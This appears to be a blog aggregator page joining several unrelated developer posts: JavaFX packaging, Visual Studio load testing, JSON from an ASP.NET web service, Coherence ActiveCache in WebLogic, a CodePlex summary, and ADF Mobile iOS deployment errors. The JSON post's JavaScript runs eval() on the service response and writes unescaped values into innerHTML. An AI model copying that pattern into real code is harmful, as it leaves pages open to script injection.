built from Java executable jar"/> <fx:application id="myapp" version="1.0" mainClass="app.Main" name="MyJavaApp"/> <fx:resources> <fx:fileset dir="dist"> <include name="javamain.jar"/> <include name="lib/somelib.jar"/> <include name="morelibs/anotherlib.jar"/> </fx:fileset> </fx:resources> </fx:deploy> </target> Option to disable proxy setup in the JavaFX launcher Since JavaFX 2.2 (part of JDK 7u6) properly packaged JavaFX applications  have proxy settings initialized according to Java Runtime configuration settings. This is handy for most of the application accessing network with one exception. If your application explicitly sets networking properties (e.g. socksProxyHost) then they must be set before networking stack is initialized. Proxy detection will initialize networking stack and therefore your custom settings will be ignored. One way to disable proxy setup by the embedded JavaFX launcher is to pass "-Djavafx.autoproxy.disable=true" on the command line. This is good for troubleshooting (proxy detection may cause significant startup time increases if network is misconfigured) but not really user friendly. Now proxy setup will be disabled if manifest of main application jar has "JavaFX-Feature-Proxy" entry with value "None". Here is simple example of adding this entry using <fx:jar> task: <fx:jar destfile="dist/sampleapp.jar"> <fx:application refid="myapp"/> <fx:resources refid="myresources"/> <fileset dir="build/classes"/> <manifest> <attribute name="JavaFX-Feature-Proxy" value="None"/> </manifest> </fx:jar> Ability to specify codebase for WebStart application JavaFX applications do not need to specify codebase (i.e. absolute location where application code will be deployed) for most of real world deployment scenarios. This is convenient as application does not need to be modified when it is moved from development to deployment environment. However, some developers want to ensure copies of their application JNLP file will redirect to master location. This is where codebase is needed. To avoid need to edit JNLP file manually <fx:deploy> task now accepts optional codebase attribute. If attribute is not specified packager will generate same no-codebase files as before. If codebase value is explicitly specified then generated JNLP files (including JNLP content embedded into web page) will use it.  Here is an example: <fx:deploy width="600" height="400" outdir="Samples" codebase="http://localhost/codebaseTest" outfile="TestApp"> .... </fx:deploy> Option to update existing jar file JavaFX packaging procedures are optimized for new application that can use ant or command line javafxpackager utility. This may lead to some redundant steps when you add it to your existing build process. One typical situation is that you might already have a build procedure that produces executable jar file with custom manifest. To properly package it as JavaFX executable jar you would need to unpack it and then use javafxpackager or <fx:jar> to create jar again (and you need to make sure you pass all important details from your custom manifest). We added option to pass jar file as an input to javafxpackager and <fx:jar>. This simplifies integration of JavaFX packaging tools into existing build  process as postprocessing step. By the way, we are looking for ways to simplify this further. Please share your suggestions! On the technical side this works as follows. Both <fx:jar> and javafxpackager will attempt to update existing jar file if this is the only input file. Update process will add JavaFX launcher classes and update the jar manifest with JavaFX attributes. Your custom attributes will be preserved. Update could be performed in place or result may be saved to a different file. Main-Class and Class-Path elements (if present) of manifest of input jar file will be used for JavaFX application  unless they are explicitly overriden in the packaging command you use. E.g. attribute mainClass of <fx:application> (or -appclass in the javafxpackager case) overrides existing Main-Class in the jar manifest. Note that class specified in the Main-Class attribute could either extend JavaFX Application or provide static main() method. Here are examples of updating jar file using javafxpackager: Create new JavaFX executable jar as a copy of given jar file javafxpackager -createjar -srcdir dist -srcfiles fish_proto.jar -outdir dist -outfile fish.jar  Update existing jar file to be JavaFX executable jar and use test.Fish as main application class javafxpackager -createjar -srcdir dist -appclass test.Fish -srcfiles fish.jar -outdir dist -outfile fish.jar  And here is example of using <fx:jar> to create new JavaFX executable jar from the existing fish_proto.jar: <fx:jar destfile="dist/fish.jar"> <fileset dir="dist"> <include name="fish_proto.jar"/> </fileset> </fx:jar> Self-Contained Applications: Specify application icon The only way to specify application icon for self-contained application using tools in JDK 7 update 6 is to use drop-in resources. Now this bug is resolved and you can also specify icon using <fx:icon> tag. Here is an example: <fx:deploy ...> <fx:info> <fx:icon href="default.png"/> </fx:info> ... </fx:deploy> Few things to keep in mind: Only default kind of icon is applicable to self-contained applications (as of now) Icon should follow platform specific rules for sizes and image format (e.g. .ico on Windows and .icns on Mac) Self-Contained Applications: Pass parameters on the command line JavaFX applications support two types of application parameters: named and unnamed (see the API for Application.Parameters). Static named parameters can be added to the application package using <fx:param> and unnamed parameters can be added using <fx:argument>. They are applicable to all execution modes including standalone applications. It is also possible to pass parameters to a JavaFX application from a Web page that hosts it, using <fx:htmlParam>.  Prior to JavaFX 2.2, this was only supported for embedded applications. Starting from JavaFX 2.2, <fx:htmlParam> is applicable to Web Start applications also. See JavaFX deployment guide for more details on this. However, there was no way to pass dynamic parameters to the self-contained application. This has been improved and now native launchers will  delegate parameters from command line to the application code. I.e. to pass parameter to the application you simply need to run it as "myapp.exe somevalue" and then use getParameters().getUnnamed().get(0) to get "somevalue".

    Read the article

  • Load and Web Performance Testing using Visual Studio Ultimate 2010-Part 2

    - by Tarun Arora
    Welcome back, in part 1 of Load and Web Performance Testing using Visual Studio 2010 I talked about why Performance Testing the application is important, the test tools available in Visual Studio Ultimate 2010 and various test rig topologies. In this blog post I’ll get into the details of web performance & load tests as well as why it’s important to follow a goal based pattern while performance testing your application. Tools => Options => Test Tools Have you visited the treasures of Visual Studio Menu bar tools => Options => Test Tools lately? The options to enable disable prompts on creating, editing, deleting or running manual/automated tests can be controller from here. The default test project language and default test types created on a new test project creation could be selected/unselected from here. Ever wondered how you can change the default limit of 25 test results, this can again be changed from here. If you record a lot of Web Tests and wish for the web test recorder to start with “that” URL populated, well this again can be specified from here. If you haven’t so far, I would urge you to spend 2 minutes in the test tools options.   Test Menu => Ready Steady Test Action! The Test tools are under the Test Menu in Visual Studio, apart from being able to create a new Test and Test List you can also load an existing vsmdi file. You can also manage your test controllers from here. A solution can have one or more test setting files, but there can only be one active test settings file at any time. Again, this selection can be done from here.  You can open the various test windows from under the windows option from the test menu. If you open the Test view window you will see that you have the option to group the tests by work items, project, test type, etc. You can set these properties by right clicking a test in the test list and choosing properties from the context menu.    So, what is a vsmdi file? vsmdi stands for Visual Studio Test Metadata File. Placed under the Solution Items this file keeps track of the list of unit tests in your solution. If you open the vsmdi file as an xml file you will see a series of Test Links nested with in the list Test List tags along with the Run Configuration tag. When in visual studio you run tests, the IDE looks at the vsmdi file to see what tests need to be run. You also have the option of using the vsmdi file in your team builds to specify which tests need to run as part of the build. Refer here for a walkthrough from a fellow blogger on how to use the vsmdi file in the team builds. Web Performance Test – The Truth! In Visual Studio 2010 “Web Tests” have been renamed to “Web Performance Tests”. Apart from renaming this test type there have been several improvements to this test type in visual studio 2010. I am very active on the MSDN Visual Studio And Load Testing forum and a frequent question from many users is “Do Web Tests support Pages that run JavaScript?” I will start with a little bit of background before answering this question. Web Performance Tests operate at the HTTP Layer, but why? To enable you to generate high loads with a relatively low amount of hardware, Web performance tests are driven at the protocol layer rather than instantiating a browser.The most common source of confusion is that users do not realize Web Performance Tests work at the HTTP layer. The tool adds to that misconception. After all, you record in IE, and when running a Web test you can select which browser to use, and then the result viewer shows the results in a browser window. So that means the tests run through the browser, right? NO! The Web test engine works at the HTTP layer, and does not instantiate a browser. What does that mean? In the diagram below, you can see there are no browsers running when the engine is sending and receiving requests. Does that mean I can’t test pages that use Java script? The best example for java script generating HTTP traffic is AJAX calls. The most common example of browser plugins are Silverlight or Flash. The Web test recorder will record HTTP traffic from AJAX calls and from most (but not all) browser plugins. This means you will still be able to web performance test pages that use java script or plugin and play back the results but the playback engine will not show the java script or plug in results in the ‘browser control’. If you want to test the page behaviour as a result of the java script or plug in consider using Coded UI Tests. This page looks like it failed, when in fact it succeeded! Looking closely at the response, and subsequent requests, it is clear the operation succeeded. As stated above, the reason why the browser control is pasting this message is because java script has been disabled in this control. So, to reiterate, the web performance test recorder: - Sends and receives data at the HTTP layer. - Does NOT run a browser. - Does NOT run java script. - Does NOT host ActiveX controls or plugins. There is a great series of blog posts from Ed Glas, i would highly recommend his blog to any one performing Load/Performance testing through Visual Studio. Demo – Web Performance Test [Demo] - Visual Studio Ultimate 2010: Test Settings and Configuration   [Demo]–Visual Studio Ultimate 2010: Web Performance Test   In this short video I try and answer the following questions, Why is performance Testing important? How does Visual Studio Help you performance Test your applications? How do i record a web performance test? How do make a web performance test data driven, transaction driven, loop driven, convert to code, add validations? Best practices for recording Web Performance Tests. I have a web performance test, what next? Creating the Web Performance Test was the first step towards load testing your application. Now that we have the base test we can test the page behaviour when N-users access the page. Have you ever had the head of business call you and mention that the marketing team has done a fantastic job and are expecting increased traffic on the web site, can the website survive the weekend with that additional load? This is the perfect opportunity to capacity test your application to see how your website holds up under various levels of load, you can work the results backwards to see how much hardware you may need to scale up your application to survive the weekend. Apart from that it is always a good idea to have some benchmarks around how the application performs under light loads for short duration, under heavy load for long duration and soak test the application run a constant load for a very week or two to record the effects of constant load for really long durations, this is a great way of identifying how your application handles the default IIS application pool reset which by default is configured to once every 25 hours. These bench marks will act as the perfect yard stick to measure performance gains when you start making improvements. BUT there are some best practices! => Goal Based Load Testing Approach Since the subject is vast and there are a lot of things to measure and analyse, … it is very easy to get distracted from the real goal!  You can optimize your application once you know where the pain points are. There is no point performing a load test of 5000 users if your intranet application will only have a 100 simultaneous users, it is important to keep focussed on the real goals of the project. So the idea is to have a user story around your load testing scenarios and test realistically. So it is recommended that you follow the below outline, It is an Iterative process, refine your objectives, identify the key scenarios, what is the expected workload, key metrics you want to report, record the web performance tests, simulate load and analyse results. Is your application already deployed in Production? This is great! You can analyse the IIS Logs to understand the user behaviour… But what are IIS LOGS? The IIS logs allow you to record events for each application and Web site on the Web server. You can create separate logs for each of your applications and Web sites. Logging information in IIS goes beyond the scope of the event logging or performance monitoring features provided by Windows. The IIS logs can include information, such as who has visited your site, what the visitor viewed, and when the information was last viewed. You can use the IIS logs to identify any attempts to gain unauthorized access to your Web server. How to configure IIS LOGS? For those Ninjas who already have IIS Logs configured (by the way its on by default) and need a way to analyse the IIS Logs, can use the Windows IIS Utility – Log Parser. Log Parser is a very powerful tool that provides a generic SQL-like language on top of many types of data like IIS Logs, Event Viewer entries, XML files, CSV files, File System and others; and it allows you to export the result of the queries to many output formats such as CSV, XML, SQL Server, Charts and others; and it works well with IIS 5, 6, 7 and 7.5. Frequently used Log Parser queries. Demo – Load Test [Demo]–Visual Studio Ultimate 2010: Load Testing   In this short video I try and answer the following questions, - Types of Performance Testing? - Perform Goal driven Load Testing, analyse Test Run Result and Generate a report? Recap A quick recap of what we have covered so far,     Thank you for taking the time out and reading this blog post, in part III of this blog series I’ll be getting into the details of Test Result Analysis, Test Result Drill through, Test Report Generation, Test Run Comparison, and the Asp.net Profiler. If you enjoyed the post, remember to subscribe to http://feeds.feedburner.com/TarunArora. Questions/Feedback/Suggestions, etc please leave a comment. See you on in Part III   Share this post : CodeProject

    Read the article

  • Converting a generic list into JSON string and then handling it in java script

    - by Jalpesh P. Vadgama
    We all know that JSON (JavaScript Object Notification) is very useful in case of manipulating string on client side with java script and its performance is very good over browsers so let’s create a simple example where convert a Generic List then we will convert this list into JSON string and then we will call this web service from java script and will handle in java script. To do this we need a info class(Type) and for that class we are going to create generic list. Here is code for that I have created simple class with two properties UserId and UserName public class UserInfo { public int UserId { get; set; } public string UserName { get; set; } } Now Let’s create a web service and web method will create a class and then we will convert this with in JSON string with JavaScriptSerializer class. Here is web service class. using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Services; namespace Experiment.WebService { /// <summary> /// Summary description for WsApplicationUser /// </summary> [WebService(Namespace = "http://tempuri.org/")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] [System.ComponentModel.ToolboxItem(false)] // To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line. [System.Web.Script.Services.ScriptService] public class WsApplicationUser : System.Web.Services.WebService { [WebMethod] public string GetUserList() { List<UserInfo> userList = new List<UserInfo>(); for (int i = 1; i <= 5; i++) { UserInfo userInfo = new UserInfo(); userInfo.UserId = i; userInfo.UserName = string.Format("{0}{1}", "J", i.ToString()); userList.Add(userInfo); } System.Web.Script.Serialization.JavaScriptSerializer jSearializer = new System.Web.Script.Serialization.JavaScriptSerializer(); return jSearializer.Serialize(userList); } } } Note: Here you must have this attribute here in web service class ‘[System.Web.Script.Services.ScriptService]’ as this attribute will enable web service to call from client side. Now we have created a web service class let’s create a java script function ‘GetUserList’ which will call web service from JavaScript like following function GetUserList() { Experiment.WebService.WsApplicationUser.GetUserList(ReuqestCompleteCallback, RequestFailedCallback); } After as you can see we have inserted two call back function ReuqestCompleteCallback and RequestFailedCallback which handle errors and result from web service. ReuqestCompleteCallback will handle result of web service and if and error comes then RequestFailedCallback will print the error. Following is code for both function. function ReuqestCompleteCallback(result) { result = eval(result); var divResult = document.getElementById("divUserList"); CreateUserListTable(result); } function RequestFailedCallback(error) { var stackTrace = error.get_stackTrace(); var message = error.get_message(); var statusCode = error.get_statusCode(); var exceptionType = error.get_exceptionType(); var timedout = error.get_timedOut(); // Display the error. var divResult = document.getElementById("divUserList"); divResult.innerHTML = "Stack Trace: " + stackTrace + "<br/>" + "Service Error: " + message + "<br/>" + "Status Code: " + statusCode + "<br/>" + "Exception Type: " + exceptionType + "<br/>" + "Timedout: " + timedout; } Here in above there is a function called you can see that we have use ‘eval’ function which parse string in enumerable form. Then we are calling a function call ‘CreateUserListTable’ which will create a table string and paste string in the a div. Here is code for that function. function CreateUserListTable(userList) { var tablestring = '<table ><tr><td>UsreID</td><td>UserName</td></tr>'; for (var i = 0, len = userList.length; i < len; ++i) { tablestring=tablestring + "<tr>"; tablestring=tablestring + "<td>" + userList[i].UserId + "</td>"; tablestring=tablestring + "<td>" + userList[i].UserName + "</td>"; tablestring=tablestring + "</tr>"; } tablestring = tablestring + "</table>"; var divResult = document.getElementById("divUserList"); divResult.innerHTML = tablestring; } Now let’s create div which will have all html that is generated from this function. Here is code of my web page. We also need to add a script reference to enable web service from client side. Here is all HTML code we have. <form id="form1" runat="server"> <asp:ScriptManager ID="myScirptManger" runat="Server"> <Services> <asp:ServiceReference Path="~/WebService/WsApplicationUser.asmx" /> </Services> </asp:ScriptManager> <div id="divUserList"> </div> </form> Now as we have not defined where we are going to call ‘GetUserList’ function so let’s call this function on windows onload event of javascript like following. window.onload=GetUserList(); That’s it. Now let’s run it on browser to see whether it’s work or not and here is the output in browser as expected. That’s it. This was very basic example but you can crate your own JavaScript enabled grid from this and you can see possibilities are unlimited here. Stay tuned for more.. Happy programming.. Technorati Tags: JSON,Javascript,ASP.NET,WebService

    Read the article

  • Integrating Coherence & Java EE 6 Applications using ActiveCache

    - by Ricardo Ferreira
    OK, so you are a developer and are starting a new Java EE 6 application using the most wonderful features of the Java EE platform like Enterprise JavaBeans, JavaServer Faces, CDI, JPA e another cool stuff technologies. And your architecture need to hold piece of data into distributed caches to improve application's performance, scalability and reliability? If this is your current facing scenario, maybe you should look closely in the solutions provided by Oracle WebLogic Server. Oracle had integrated WebLogic Server and its champion data caching technology called Oracle Coherence. This seamless integration between this two products provides a comprehensive environment to develop applications without the complexity of extra Java code to manage cache as a dependency, since Oracle provides an DI ("Dependency Injection") mechanism for Coherence, the same DI mechanism available in standard Java EE applications. This feature is called ActiveCache. In this article, I will show you how to configure ActiveCache in WebLogic and at your Java EE application. Configuring WebLogic to manage Coherence Before you start changing your application to use Coherence, you need to configure your Coherence distributed cache. The good news is, you can manage all this stuff without writing a single line of code of XML or even Java. This configuration can be done entirely in the WebLogic administration console. The first thing to do is the setup of a Coherence cluster. A Coherence cluster is a set of Coherence JVMs configured to form one single view of the cache. This means that you can insert or remove members of the cluster without the client application (the application that generates or consume data from the cache) knows about the changes. This concept allows your solution to scale-out without changing the application server JVMs. You can growth your application only in the data grid layer. To start the configuration, you need to configure an machine that points to the server in which you want to execute the Coherence JVMs. WebLogic Server allows you to do this very easily using the Administration Console. In this example, I will call the machine as "coherence-server". Remember that in order to the machine concept works, you need to ensure that the NodeManager are being executed in the target server that the machine points to. The NodeManager executable can be found in <WLS_HOME>/server/bin/startNodeManager.sh. The next thing to do is to configure a Coherence cluster. In the WebLogic administration console, go to Environment > Coherence Clusters and click in "New". Call this Coherence cluster of "my-coherence-cluster". Click in next. Specify a valid cluster address and port. The Coherence members will communicate with each other through this address and port. Our Coherence cluster are now configured. Now it is time to configure the Coherence members and add them to this cluster. In the WebLogic administration console, go to Environment > Coherence Servers and click in "New". In the field "Name" set to "coh-server-1". In the field "Machine", associate this Coherence server to the machine "coherence-server". In the field "Cluster", associate this Coherence server to the cluster named "my-coherence-cluster". Click in "Finish". Start the Coherence server using the "Control" tab of WebLogic administration console. This will instruct WebLogic to start a new JVM of Coherence in the target machine that should join the pre-defined Coherence cluster. Configuring your Java EE Application to Access Coherence Now lets pass to the funny part of the configuration. The first thing to do is to inform your Java EE application which Coherence cluster to join. Oracle had updated WebLogic server deployment descriptors so you will not have to change your code or the containers deployment descriptors like application.xml, ejb-jar.xml or web.xml. In this example, I will show you how to enable DI ("Dependency Injection") to a Coherence cache from a Servlet 3.0 component. In the WEB-INF/weblogic.xml deployment descriptor, put the following metadata information: <?xml version="1.0" encoding="UTF-8"?> <wls:weblogic-web-app xmlns:wls="http://xmlns.oracle.com/weblogic/weblogic-web-app" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd http://xmlns.oracle.com/weblogic/weblogic-web-app http://xmlns.oracle.com/weblogic/weblogic-web-app/1.4/weblogic-web-app.xsd"> <wls:context-root>myWebApp</wls:context-root> <wls:coherence-cluster-ref> <wls:coherence-cluster-name>my-coherence-cluster</wls:coherence-cluster-name> </wls:coherence-cluster-ref> </wls:weblogic-web-app> As you can see, using the "coherence-cluster-name" tag, we are informing our Java EE application that it should join the "my-coherence-cluster" when it loads in the web container. Without this information, the application will not be able to access the predefined Coherence cluster. It will form its own Coherence cluster without any members. So never forget to put this information. Now put the coherence.jar and active-cache-1.0.jar dependencies at your WEB-INF/lib application classpath. You need to deploy this dependencies so ActiveCache can automatically take care of the Coherence cluster join phase. This dependencies can be found in the following locations: - <WLS_HOME>/common/deployable-libraries/active-cache-1.0.jar - <COHERENCE_HOME>/lib/coherence.jar Finally, you need to write down the access code to the Coherence cache at your Servlet. In the following example, we have a Servlet 3.0 component that access a Coherence cache named "transactions" and prints into the browser output the content (the ammount property) of one specific transaction. package com.oracle.coherence.demo.activecache; import java.io.IOException; import javax.annotation.Resource; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import com.tangosol.net.NamedCache; @WebServlet("/demo/specificTransaction") public class TransactionServletExample extends HttpServlet { @Resource(mappedName = "transactions") NamedCache transactions; protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { int transId = Integer.parseInt(request.getParameter("transId")); Transaction transaction = (Transaction) transactions.get(transId); response.getWriter().println("<center>" + transaction.getAmmount() + "</center>"); } } Thats it! No more configuration is necessary and you have all set to start producing and getting data to/from Coherence. As you can see in the example code, the Coherence cache are treated as a normal dependency in the Java EE container. The magic happens behind the scenes when the ActiveCache allows your application to join the defined Coherence cluster. The most interesting thing about this approach is, no matter which type of Coherence cache your are using (Distributed, Partitioned, Replicated, WAN-Remote) for the client application, it is just a simple attribute member of com.tangosol.net.NamedCache type. And its all managed by the Java EE container as an dependency. This means that if you inject the same dependency (the Coherence cache named "transactions") in another Java EE component (JSF managed-bean, Stateless EJB) the cache will be the same. Cool isn't it? Thanks to the CDI technology, we can extend the same support for non-Java EE standards components like simple POJOs. This means that you are not forced to only use Servlets, EJBs or JSF in order to inject Coherence caches. You can do the same approach for regular POJOs created for you and managed by lightweight containers like Spring or Seam.

    Read the article

  • CodePlex Daily Summary for Sunday, June 06, 2010

    CodePlex Daily Summary for Sunday, June 06, 2010New ProjectsActive Worlds Dot Net Wrapper (Based on AwSdk): Active Worlds Dot Net Wrapper (Based on AwSdk)Combina: Smart calculator for large combinatorial calculations.Concurrent Cache: ConcurrentCache is a smart output cache library extending OutputCacheProvider. It consists of in memory, cache files and compressed files modes and...Decay: Personal use. For learningFazTalk: FazTalk is a suite of tools and products that are designed to improve collaboration and workflow interactions. FazTalk takes an innovative approach...grouped: A peer to peer text editor, written in C# [update] I wrote this little thing a while back and even forgot about it, I stopped coding for more tha...HitchARide MVC 2 Sample: An MVC 2 sample written as part of the Microsoft 2010 London Web Camp based on the wireframes at http://schematics.earthware.co.uk/hitcharide. Not...Inspiration.Web: Description: A simple (but entertaining) ASP.NET MVC (C#) project to suggest random code names for projects. Intended audience: People who ne...NetFileBrowser - TinyMCE: tinyMCE file plugin with asp.netOil Slick Live Feeds: All live feeds from BP's Remotely Operated VehiclesParticle Lexer: Parser and Tokenizer libraryPdf Form Tool: Pdf Form Tool demonstrates how the iTextSharp library could be used to fill PDF forms. The input data is provided as a csv file. The application ...Planning Poker Windows Mobile 7: This project is a Planning Poker application for Windows Mobile 7 (and later?). RandomRat: RandomRat is a program for generating random sets that meet specific criteriaScience.NET: A scientific library written in managed code. It supports advanced mathematics (algebra system, sequences, statistics, combinatorics...), data stru...Spider Compiler: Spider Compiler parses the input of a spider programming source file and compiles it (with help of csc.exe; the C#-Compiler) to an exe-file. This p...Sununpro: sunun's project for study by team foundation server.TFS Buddy: An application that manipulates your I-Buddy whenever something happens in your Team Foundation ServerValveSoft: ValveSysWiiMote Physics: WiiMote Physics is an application that allows you to retrieve data from your WiiMote or Balance Board and display it in real-time. It has a number...WinGet: WinGet is a download manager for Windows. You can drag links onto the WinGet Widget and it will download a file on the selected folder. It is dev...XProject.NET: A project management and team collaboration platformNew Releases.NET DiscUtils: Version 0.9 Preview: This release is still under development. New features available in this release: Support for accessing short file names stored in WIM files Incr...Active Worlds Dot Net Wrapper (Based on AwSdk): Active World Dot Net Wrapper (0.0.1.85): Based on AwSdk 85AwSdk UnOfficial Wrapper Howto Use: C# using AwWrapper; VB.Net Import AwWrapperAjaxControlToolkit additional extenders: ZhecheAjaxControls for .NET3.5: Used AJAX Control Toolkit Release Notes - April 12th 2010 Release Version 40412. Fixed deadlock in long operation canceling Some other fixesAnyCAD: AnyCAD.v1.2.ENU.Install: http://www.anycad.net Parametric Modeling *3D: Sphere, Box, Cylinder, Cone •2D: Line, Rectangle, Arc, Arch, Circle, Spline, Polygon •Feature: Extr...Community Forums NNTP bridge: Community Forums NNTP Bridge V29: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has ad...Concurrent Cache: 1.0: This is the first release for the ConcurrentCache library.Configuration Section Designer: 2.0.0: This is the first Beta Release for VS 2010 supportDoxygen Browser Addin for VS: Doxygen Browser Addin - v0.1.4 Beta: Support for Visual Studio 2010 improved the logging of errors (Event Logs) Fixed some issues/bugs Hot key for navigation "Control + F1, Contr...Folder Bookmarks: Folder Bookmarks 1.6.2: The latest version of Folder Bookmarks (1.6.2), with new UI changes. Once you have extracted the file, do not delete any files/folders. They are n...HERB.IQ: Beta 0.1 Source code release 5: Beta 0.1 Source code release 5Inspiration.Web: Initial release (deployment package): Initial release (deployment package)NetFileBrowser - TinyMCE: Demo Project: Demo ProjectNetFileBrowser - TinyMCE: NetFileBrowser: NetImageBrowserNLog - Advanced .NET Logging: Nightly Build 2010.06.05.001: Changes since the last build:2010-06-04 23:29:42 Jarek Kowalski Massive update to documentation generator. 2010-05-28 15:41:42 Jarek Kowalski upda...Oil Slick Live Feeds: Oil Slick Live Feeds 0.1: A the first release, with feeds from the MS Skandi, Boa Deep C, Enterprise and Q4000. They are live streams from the ROV's monitoring the damaged...Pcap.Net: Pcap.Net 0.7.0 (46671): Pcap.Net - June 2010 Release Pcap.Net is a .NET wrapper for WinPcap written in C++/CLI and C#. It Features almost all WinPcap features and includes...sqwarea: Sqwarea 0.0.289.0 (alpha): API supportTFS Buddy: TFS Buddy First release (Beta 1): This is the first release of the TFS Buddy.Visual Studio DSite: Looping Animation (Visual C++ 2008): A solider firing a bullet that loops and displays an explosion everytime it hits the edge of the form.WiiMote Physics: WiiMote Physics v4.0: v4.0.0.1 Recovered from existing compiled assembly after hard drive failure Now requires .NET 4.0 (it seems to make it run faster) Added new c...WinGet: Alpha 1: First Alpha of WinGet. It includes all the planned features but it contains many bugs. Packaged using 7-Zip and ClickOnce.Most Popular ProjectsWBFS ManagerRawrAJAX Control ToolkitMicrosoft SQL Server Product Samples: DatabaseSilverlight ToolkitWindows Presentation Foundation (WPF)PHPExcelpatterns & practices – Enterprise LibraryMicrosoft SQL Server Community & SamplesASP.NETMost Active ProjectsCommunity Forums NNTP bridgeRawrpatterns & practices – Enterprise LibraryGMap.NET - Great Maps for Windows Forms & PresentationN2 CMSIonics Isapi Rewrite FilterStyleCopsmark C# LibraryFarseer Physics Enginepatterns & practices: Composite WPF and Silverlight

    Read the article

  • Diagnosing ADF Mobile iOS deployment problems

    - by Chris Muir
    From time to time I encounter customers who have taken possession of a brand new Apple Mac, have that excited "I've just spent more on a computer then I ever wanted to but it's okay" crazy gleam in their eye, but on pre-loading all the necessary software for Oracle's ADF Mobile to start their mobile campaign, following Oracle's setup instructions and deploying their first app to Apple's XCode iPhone Simulator they hit this error message in the JDeveloper Log-Deployment window: [01:36:46 PM] Deployment cancelled. [01:36:46 PM] ----  Deployment incomplete  ----. [01:36:46 PM] Failed to build the iOS application bundle. [01:36:46 PM] Deployment failed due to one or more errors returned by '/Applications/Xcode.app/Contents/Developer/usr/bin/xcodebuild'.  The following is a summary of the returned error(s): Command-line execution failed (Return code: 69) "Oh, return code 69, I know that well" I hear you say.  Admittedly the error code is less than useful besides drawing some titters from the peanut gallery. Before explaining what's gone wrong, I think it's useful to teach customers how to diagnose these issues themselves.  When ADF Mobile commences a deployment, be it to Apple's iOS or Google's Android platforms, JDeveloper and ADF Mobile do a good job in the Log window of showing you what the deployment process entails.  In the case of deploying to iOS the log window will literally include the XCode commands executed to complete the deployment cycle. As example here's the log output that was produced before the error message was raised.... take the opportunity to read this line by line and note the command line calls highlighted in blue: (Note some of the following lines have been split over multiple lines to suit reading on this blog, each original line is preceded by a timestamp. Ensure to check the exact commands from JDev) [01:36:33 PM] Target platform is (iOS). [01:36:33 PM] Beginning deployment of ADF Mobile application 'LayoutDemo' to iOS using profile 'IOS_MOBILE_NATIVE_archive1'. [01:36:34 PM] Command-line executed: [/Applications/Xcode.app/Contents/Developer/usr/bin/xcodebuild, -version] [01:36:34 PM] Command-line execution succeeded. [01:36:34 PM] Running dependency analysis... [01:36:34 PM] Building... [01:36:34 PM] Deploying 3 profiles... [01:36:35 PM] Wrote Archive Module to /Users/chris/fmw/jdeveloper/jdev/extensions/ oracle.adf.mobile/Samples/PublicSamples/LayoutDemo/ApplicationController/ deploy/ApplicationController.jar [01:36:35 PM] WARNING: No Resource Catalog enabled ADF components found to package [01:36:36 PM] Wrote Archive Module to /Users/chris/fmw/jdeveloper/jdev/extensions/ oracle.adf.mobile/Samples/PublicSamples/LayoutDemo/ViewController/ deploy/ViewController.jar [01:36:36 PM] Verifying existence of the .adf source directory of the ADF Mobile application... [01:36:36 PM] Verifying Application Controller project exists... [01:36:36 PM] Verifying application dependencies... [01:36:36 PM] The application may not function correctly because the following dependent libraries are missing: /Users/chris/jdev/jdeveloper/jdeveloper/jdev/extensions/oracle.adf.mobile/ lib/adfmf.springboard.jar [01:36:36 PM] Verifying project dependencies... [01:36:36 PM] Validating application XML files... [01:36:36 PM] Validating XML files in project ApplicationController... [01:36:36 PM] Validating XML files in project ViewController... [01:36:40 PM] Copying common javascript files... [01:36:41 PM] Copying FARs to the ADF Mobile Framework application... [01:36:41 PM] Extracting Feature Archive file, "ApplicationController.jar" to deployment folder, "ApplicationController". [01:36:42 PM] Extracting Feature Archive file, "ViewController.jar" to deployment folder, "ViewController". [01:36:42 PM] Deploying skinning files... [01:36:43 PM] Copying the CVM SDK files built for the x86 processor... [01:36:43 PM] Copying the CVM JDK files built for the x86 processor... [01:36:43 PM] Command-line executed: [cp, -R, -p, /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/iOS/jvmti/x86/, /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/ Samples/PublicSamples/ LayoutDemo/deploy/IOS_MOBILE_NATIVE_archive1/temporary_xcode_project/lib] [01:36:43 PM] Command-line execution succeeded. [01:36:43 PM] Command-line executed: [cp, -R, -p, /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/iOS/jvmti/jar/, /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/Samples/ PublicSamples/LayoutDemo/deploy/IOS_MOBILE_NATIVE_archive1/ temporary_xcode_project/lib] [01:36:43 PM] Command-line execution succeeded. [01:36:43 PM] Copying security related files to the ADF Mobile Framework application... [01:36:44 PM] Command-line executed from path: /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/Samples/ PublicSamples/LayoutDemo/deploy/IOS_MOBILE_NATIVE_archive1/temporary_xcode_project/ [01:36:44 PM] Command-line executed: /Applications/Xcode.app/Contents/Developer/usr/bin/xcodebuild clean install -configuration Debug -sdk /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneSimulator.platform/ Developer/SDKs/iPhoneSimulator6.1.sdk DSTROOT=/Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/Samples/ PublicSamples/LayoutDemo/deploy/IOS_MOBILE_NATIVE_archive1/Destination_Root/ IPHONEOS_DEPLOYMENT_TARGET=5.0 TARGETED_DEVICE_FAMILY=1,2 PRODUCT_NAME=LayoutDemo ADD_SETTINGS_BUNDLE=NO As you can see when we move from JDeveloper undertaking its work, it then passes the code off in the last few lines for Apple's XCode to assemble and deploy the required .ipa file.  From the original error message which followed this complaining about xcodebuild failing with return code 69, we can quickly see the exact command line used to call xcodebuild. As this is the exact command line call with all its options, you're free to open a Terminal window in Mac OSX and execute the same command by simply copying and pasting the command line. And via this you'll then find out what return code actually 69 means.  Unfortunately it's not that exciting. For Macs that have just been installed and configured with XCode, XCode (and for that matter iTunes) which is required by ADF Mobile to 